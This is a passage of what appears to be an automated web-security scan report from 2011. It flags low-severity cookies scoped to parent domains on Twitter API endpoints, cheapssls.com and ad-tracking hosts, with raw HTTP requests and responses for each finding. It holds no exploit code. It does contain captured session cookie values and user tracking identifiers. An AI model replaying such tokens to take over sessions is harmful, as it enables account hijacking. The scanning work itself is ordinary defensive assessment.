Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-45108-50610
X-RateLimit-Limit: 1000
ETag: "d751713988987e9331980363e24189ce"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 928
X-Runtime: 0.02260
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: f93599e88aea3aada9e6f45227542fc39a33d090
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 2
Connection: close

[]

10.10. http://api.twitter.com/i/search/image_facets.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /i/search/image_facets.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/search/image_facets.json?q=%23TechCocktailBOS&count=100&include_entities=true HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-44326-31901
X-RateLimit-Limit: 1000
ETag: "d751713988987e9331980363e24189ce"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 919
X-Runtime: 0.04123
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 5334a5d9d0766cf62564aec25fcc48f383905b2a
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 2
Connection: close

[]

10.11. http://api.twitter.com/i/search/video_facets.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /i/search/video_facets.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/search/video_facets.json?q=%23TechCocktailBOS&count=100&include_entities=true HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-51253-25148
X-RateLimit-Limit: 1000
ETag: "d751713988987e9331980363e24189ce"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 927
X-Runtime: 0.01353
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: cf2636f059490d3226454b5ea11f43dae0e606d8
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 2
Connection: close

[]

10.12. http://login.dotomi.com/ucm/UCMController

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/ HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:42 GMT
X-Name: dmc-s09
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=230900890276886667$0$2054424934; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
Set-Cookie: DotomiSession_2304=2_270600892638176047$230900890276886667$2054424934$1315085562782; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUFRLZ3hua1xARWZBXAICW0dLSEFdZWBcemhkUH5RIgFAaV0%3D; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
Set-Cookie: DotomiRR2304=-1$4$1$-1$1$1$; Domain=.dotomi.com; Expires=Sun, 04-Sep-2011 21:32:42 GMT; Path=/
Content-Type: text/html
Content-Length: 1573

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

10.13. http://www.cheapssls.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cheapssls.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST / HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 3791
Cache-Control: max-age=0
Origin: http://www.cheapssls.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKYQY9kNoc4OMitTj
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.16.9.1315085525172; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

------WebKitFormBoundaryKYQY9kNoc4OMitTj
Content-Disposition: form-data; name="result_ids"

cart_status,wish_list
------WebKitFormBoundaryKYQY9kNoc4OMitTj
Content-Disposition: form-data; name="re
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:43:49 GMT
Location: http://www.cheapssls.com/index.php?dispatch=checkout.cart
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=oimsl5irn8eq044otel7tsq8g5; expires=Sat, 17-Sep-2011 21:43:49 GMT; path=/; domain=.cheapssls.com
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:43:49 GMT
Content-Length: 180

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.cheapssls.com/index.php?dispatch=checkout.cart">here</a></body>

10.14. http://www.cheapssls.com/index.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?dispatch=checkout.cart HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.16.9.1315085525172; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:43:50 GMT
Location: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=tt1a563t87rk9ibbpnpq0ptvm4; expires=Sat, 17-Sep-2011 21:43:50 GMT; path=/; domain=.cheapssls.com
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:43:49 GMT
Content-Length: 181

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.cheapssls.com/index.php?dispatch=checkout.cart">here</a></body>

10.15. http://adx.adnxs.com/mapuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESEKgpi49hCX6BTIEggQaw2oU&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/?subcats=Y&status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WEi'/29uJ21V)`B-9`/7Ko9MUt3xzi'/4ZgI!6aZWx4#ZcXfR=T@A^0Y`4jmC=WN@m!nW>/7tnkB5j%8zT+4q#daaX4Tjg6O#PQRq%^).H=M=x0Xe3#2vn<%BNdgF1+j)nl2fp%0

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTUxEovuo'X=/ApOr*wE6fP`eZ>X_^MS9msNvwfBdwq+A2^gBD?E`pXV4!Z2YRw'aDH3b-#N8#h5/Q^zP]:QTe<UWK8'A/7kEl85o3j7x!Eu$k697cSk*X.z!-StL_FOb=bj8C1LwIH1jWG_mK:.+0R#^DMqlv9QIFftd[EgzHM^; path=/; expires=Fri, 02-Dec-2011 21:41:28 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:41:28 GMT

GIF89a.............!.......,........@..L..;

10.16. http://am.trafficmp.com/a/bpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://am.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=41&id=23 HTTP/1.1
Host: am.trafficmp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=SEO000000000W&dtmc_ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&dtmc_loc=http%3A//www.register.com/
Cookie: rth=2-lpay4l-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-44~0~1~1-; uid2=499d34e38-cf7e-49f0-bcb0-ea11d282884d-gquw3zmv; T_i366=ltn%3Axc1f%3A1; T_50nu=ltn%3Axc1g%3A1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 03 Sep 2011 21:56:33 GMT
Connection: close
Set-Cookie: T_i366=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_50nu=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k5bs=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8t18=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3dqj=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gbo2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_hatf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_a6ik=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7ays=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1icy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c1h2=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5mlb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bis5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6ovq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_juxr=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4f6f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_j20p=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_97h5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9n5i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gqzz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l42m=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_apfx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_56hy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7ie7=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_kr8s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_eeio=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1cyz=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8s6f=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5t2t=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ao1w=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jy9u=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_che1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k0ro=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_j6gc=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9qc3=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_1jao=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d2cl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_35nq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f15s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_iva8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8j53=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bh8s=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6ppb=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_gdl1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6djq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_40xg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ku6m=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_n5u=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_67pf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6nf8=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8nzd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g4f5=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ej8q=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f1vi=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_540v=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k6pv=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_jv4e=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_l30v=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k9ng=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
